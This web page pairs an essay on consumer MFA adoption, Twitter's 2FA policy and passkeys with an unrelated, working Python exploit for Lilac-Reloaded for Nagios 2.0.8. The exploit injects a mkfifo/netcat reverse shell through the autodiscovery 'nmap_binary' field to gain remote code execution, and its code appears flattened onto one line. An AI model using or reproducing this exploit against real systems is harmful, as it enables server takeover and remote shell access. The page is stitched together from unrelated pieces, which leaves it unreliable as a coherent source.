The challenge of getting users to sign up for any form of MFA lies in the technology's origin story. Passwords predate modern online services by thousands of years (just think about "Open, Sesame" in "Ali Baba and the 40 Thieves"). Two-factor authentication entered the picture much later as a way for enterprises and governments to protect their internal systems with something you know (password) and something you have (device, code, or security key).

Technologies developed in an enterprise context have historically prioritized security. The administrator has the power to enforce security measures across the employee base to protect the company's interests. When organizations try to use the same playbook with consumers, they fail, because consumers can vote with their feet. And the impact can quickly become existential.

So, what about authenticator apps? For us in the industry, this might look like the obvious technical alternative to SMS-based methods. But few end users are this digitally savvy. The more likely result of forcing something like an authenticator app or security key at scale is that people just won't use it.

**Phishing-Resistant Authentication**

The transition to phishing-resistant factors offers one potential solution to consumer MFA woes. FIDO and WebAuthn rely on public key cryptography and biometrics to significantly improve both security and the user experience. When using public key cryptography, there are no codes or secrets to be stolen. Users go through a biometric check on their device to unlock access to their private key, which is way faster than entering an SMS code. There are nuances in how biometric data is validated that can make a big difference for data privacy and security.

**The Passkeys Opportunity**

Despite exciting progress toward more secure and usable factors, the best MFA mechanism for consumers really isn't MFA at all — it's passkeys. Passkeys are a FIDO authenticator with the advantage of being backed up to the cloud, so if you lose your device or buy a new one, all you must do is sign into your iCloud or Google Play account to recover your passkeys. Passkeys use public key cryptography and device biometrics, making them resistant to many known attacks, and are easy for the user.

Should passkeys have been used on Twitter? Absolutely, but they may not have been a clear option at the time. Supporting something new is always expensive from the engineering perspective. If passkeys had been an option, the experience for the user might have looked something like this:

1.  The user signs into Twitter on their mobile device with username and password;
2.  They are asked if they would like to use a passkey to authenticate next time; and
3.  The user receives a biometric prompt from then on without needing to install anything. They can even go to their Mac and open Twitter in Safari, and the passkey will be automatically synced to that device.

Offering passkey authentication currently requires some reworking, but it's easier and more cost-effective than SMS. Unfortunately, passkeys are not yet uniformly distributed. Apple added support early on, followed by Android and Chrome. Windows currently supports passkeys on a single device.

Whenever you're asking people to change, you need to take concrete steps to make the transition easier. In the case of Twitter, that would be explaining to users what they can do to change their second factor, to avoid them dropping MFA entirely. This would be an amazing passkey adoption opportunity if the industry were ready. We're already in a fantastic position to encourage people to use this flavor of passwordless. What comes next is making it easier for developers to implement the necessary changes in their apps and websites. A future with fewer passwords may not be so far away after all.

Twitter's 2FA Policy Is a Call for Passkey Disruption

Lilac-Reloaded for Nagios version 2.0.l8 remote code execution exploit.

    #!/usr/bin/env python"""# Exploit Title: Lilac-Reloaded for Nagios 2.0.8 - Remote Code Execution (RCE)# Google Dork: N/A# Date: 2023-04-13# Exploit Author: max / Zoltan Padanyi# Vendor Homepage: https://exchange.nagios.org/directory/Addons/Configuration/Lilac-2DReloaded/visit# Software Link: https://sourceforge.net/projects/lilac--reloaded/files/latest/download# Version: 2.0.8# Tested on: Debian 7.6# CVE : N/AThe autodiscovery feature lacks any kind of input filtering, so we can add our own commands there terminated with a ;Use at your own risk!RCA - wild exec is ongoing without any filteringin library/Net/Traceroute.php   181      function _setTraceroutePath($sysname)   182      {   183          $status    = '';   184          $output    = array();   185          $traceroute_path = '';   186   187          if ("windows" == $sysname) {   188              return "tracert";   189          } else {   190              $traceroute_path = exec("which traceroute", $output, $status);   [...]   257      function traceroute($host)   258      {   259   260          $argList = $this->_createArgList();   261          $cmd = $this->_traceroute_path." ".$argList[0]." ".$host." ".$argList[1];   262          exec($cmd, $this->_result);"""import requestsimport argparseparser = argparse.ArgumentParser()parser.add_argument("-u", "--url", help="The full path of the autodiscover.php in lilac (i.e. http://127.0.0.1/lilac/autodiscovery.php", required=True)parser.add_argument("-i", "--ip", help="Listener IP", required=True)parser.add_argument("-p", "--port", help="Listener port", required=True, type=int)args = parser.parse_args()rev_shell = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {args.ip} {args.port} >/tmp/f;"body = {"request":"autodiscover","job_name":"HackThePlanet","job_description":"HackThePlanet","nmap_binary":rev_shell,"default_template":"","target[2]":"1.1.1.1"}try:    r = requests.get(args.url)    if r.ok:      print("[+] URL looks good...moving forward...")      print("[+] Sending exploit in...")      r = requests.post(args.url,data=body)      if r.ok:        print("[+] Got HTTP 200, check your listener!")    else:      print("[-] Some kind of error happened, check the http response below!")      print(r.text)except Exception as e:  print("General exception: " + str(e))

Tag

#ios